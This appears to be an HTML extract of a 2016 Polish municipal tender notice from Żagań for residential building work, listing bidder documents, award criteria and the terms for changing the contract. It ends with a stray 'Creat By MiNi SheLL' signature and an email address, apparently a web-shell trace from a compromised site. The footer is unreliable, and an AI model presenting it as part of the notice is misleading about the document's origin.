<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania i złożenia poświadczeń o należytym  bądź nienależytym wykonaniu 
    zamówień wymienionych w wykazie, dotyczy najważniejszych robót, określonych
    w punkcie 5.5 podpunkt  2 SIWZ : co najmniej dwie roboty budowlane  odpowiadające 
    swoim zakresem i wartością robotom stanowiącym przedmiot zamówienia, polegające  na 
    budowie/przebudowie/ rozbudowie  budynku mieszkalnego wielorodzinnego o kubaturze 
    nie mniejszej niż 850 m3 albo o wartości wszystkich robót budowlanych związanych 
    budową /przebudową /rozbudową  budynku mieszkalnego, nie mniejszej niż 1 mln zł. 
    brutto;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Harmonogram robót.
2.  Poglądowy kosztorys ofertowy  
3. Tabela elementów rozliczeniowych (do rozliczenia etapowego); 
jako dokumenty  poglądowe  dla potrzeb Zamawiającego.  Dokumenty  poglądowe nie podlegają uzupełnieniu, a ich nie złożenie skutkuje uznaniem oferty za niezgodną z treścią SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres Gwaracji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie  :
1. Zmiany zakresu świadczenia-  w przypadku  rezygnacji  z wykonania części przedmiotu 
    umowy (zmniejszenie zakresu przedmiotu umowy). Wykonawcy z tego tytułu nie 
    przysługują żadne roszczenia, w tym prawo do  odszkodowania.
2. Zmiany w sposobie spełnienia świadczenia w przypadku: konieczności zrealizowania 
    projektu przy zastosowaniu innych rozwiązań technicznych niż wskazane w dokumentacji 
    projektowej:  
     - zmiany materiałów budowlanych, sprzętu, urządzeń oraz technologii wykonania robót w         
       sytuacji gdy wykorzystanie materiałów budowlanych, sprzętu, urządzeń wskazanych w      
       dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót stanie 
       się niemożliwe, bądź w przypadku pojawienia się na rynku materiałów, sprzętu, 
       urządzeń lub technologii nowszej generacji pozwalających na zmniejszenie kosztów 
       eksploatacji wykonanego przedmiotu zamówienia, 
     - zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych 
       /technologicznych niż wskazane w dokumentacji projektowej lub specyfikacjach 
       technicznych wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych 
       rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy lub w 
       przypadkach będących następstwem usunięcia wad  w dokumentacji projektowej lub 
       konieczności wprowadzenia  w niej  zmian. 
       W przypadku, gdy dokonanie zmian wymaga zmiany dokumentacji projektowej, strona 
       inicjująca zmianę przedstawia projekt zamienny zawierający opis proponowanych zmian.
3.  Zmiana terminu wykonania przedmiotu umowy lub jej części, przy czym zmiana 
     spowodowana może być okolicznościami leżącymi wyłącznie po stronie zamawiającego 
     lub okolicznościami niezależnymi zarówno od zamawiającego jak i od wykonawcy,
     skutkującymi koniecznością przedłużenia terminu wykonania przedmiotu umowy, w 
     przypadku:
     - nieterminowego przekazania przez zamawiającego terenu budowy, 
     - opóźnienia w dokonywaniu odbiorów z przyczyn leżących po stronie zamawiającego,
     - konieczności usunięcia wad lub  wprowadzenia zmian w dokumentacji projektowej, jeżeli 
        usunięcia wad lub konieczność wprowadzenia zmian w dokumentacji projektowej ma 
        wpływ na termin wykonania przedmiotowej umowy,
     - zlecenia wykonania zamówienia dodatkowego wynikającego z przesłanki art.67 ust.1 
       pkt.5 Ustawy Prawo zamówień publicznych , którego wykonanie ma wpływ na zmianę 
       terminu realizacji robót objętych niniejszą umową, 
    - gdy zamawiający poleci wykonawcy przerwanie wykonywania przedmiotu umowy (nie 
      wynikające z winy wykonawcy), 
    - odmiennych od przyjętych w dokumentacji projektowej warunków uniemożliwiających 
      wykonywanie robót, kolizji z sieciami infrastruktury, nieprzewidzianej w dokumentacji 
      projektowej, 
    - wykopalisk archeologicznych, niewypałów lub niewybuchów, mających wpływ na 
      terminowość wykonania umowy,   
    - niesprzyjających warunków atmosferycznych, uniemożliwiających wykonywanie robót 
      zgodnie z zasadami współczesnej wiedzy technicznej i obowiązującymi przepisami, 
   - wstrzymania prowadzonych robót poprzez akty władzy i administracji publicznej o ile 
      żądanie lub nakaz nie nastąpił z winy wykonawcy.
    Warunki dokonania zmian :  wpis w dzienniku budowy inspektora nadzoru inwestorskiego 
    lub przedstawiciela zamawiającego o braku możliwości prowadzenia robót budowlanych 
    ze wskazaniem przyczyn uniemożliwiających ich prowadzenie. 
    Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub przestoju; 
4. Zmiany wynagrodzenia ryczałtowego, w przypadku: 
   -  ustawowej zmiany stawki podatku od towarów i usług,
   -  rezygnacji z części robót- o wartość robót, które nie zostaną wykonane ustaloną na
      podstawie kosztorysu;    
   - zlecenia wykonania robót zamiennych będących następstwem usunięcia wad lub 
     wprowadzenia zmian w dokumentacji projektowej, o różnicę pomiędzy wartością robót 
     zamiennych a wartością robót, które nie będą wykonywane-podstawę do obliczenia  
     kosztów zmiany mającej wpływ na wynagrodzenia wykonawcy stanowić będzie 
     zatwierdzony przez zamawiającego kosztorys opracowany na podstawie cen 
     jednostkowych lub danych wyjściowych do kosztorysowania przyjętych do kosztorysu 
     ofertowego wykonawcy. Wykonawca przyjmie ceny materiałów wg cen zakupu 
     i pracy sprzętu wg faktycznie poniesionych kosztów lecz nie wyższe niż średnie ceny 
     materiałów i pracy sprzętu wg SEKOCENBUDU dla rejonu lubuskiego, dla kwartału 
     poprzedzającego kwartał, w którym wykonywane są roboty.
5.  Podwykonawstwa: 
     - w zakresie zmiany lub rezygnacji z podwykonawcy :na którego 
     zasoby Wykonawca powoływał się w celu wykazania spełnienia warunków  udziału w 
     postepowaniu, lub z którym zawarto umowę o podwykonawstwo w trakcie realizacji 
     zamówienia publicznego,   pod warunkiem, że Wykonawca  wykaże, iż proponowany inny  
     podwykonawca spełni warunki udziału w  postepowaniu w stopniu nie mniejszym niż 
     wymagany w trakcie postepowania o udzielenie zamówienia; lub  Wykonawca wykaże,  iż 
     samodzielnie spełni warunki udziału w postępowaniu w stopniu nie mniejszym niż 
     wymagany w trakcie postpowania o udzielenie zamówienia; 
     - w zakresie  zmiany wskazanych w ofercie lub wprowadzenia nowych części przedmiotu 
     umowy, które będą realizowane przy udziale podwykonawców.
6.  W zakresie dotyczącym zmiany kierownika budowy - w takim przypadku wykonawca jest    
     obowiązany wykazać zamawiającemu, iż proponowana osoba spełnia wymagania w 
     stopniu nie mniejszym niż wymagane stawiane kierownikowi budowy w trakcie 
     postępowania o udzielenie zamówienia, w wyniku którego została zawarta niniejsza 
     umowa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl            www.bip.zagan.pl    zakładka przetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy  w Urzędzie Miasta Żagań, 68-100, ul. Jana Pawła II  nr 15,   pok. nr 20  (w Wydziale  Zamówień  Publicznych i Nadzoru Właścicielskiego).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 11:00, miejsce: Urząd Miasta Żagań 68-100 Żagań , ul. Jana Pawła II  nr 15. pokój nr 20  Wydział  Zamówień  Publicznych i Nadzoru Właścicielskiego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com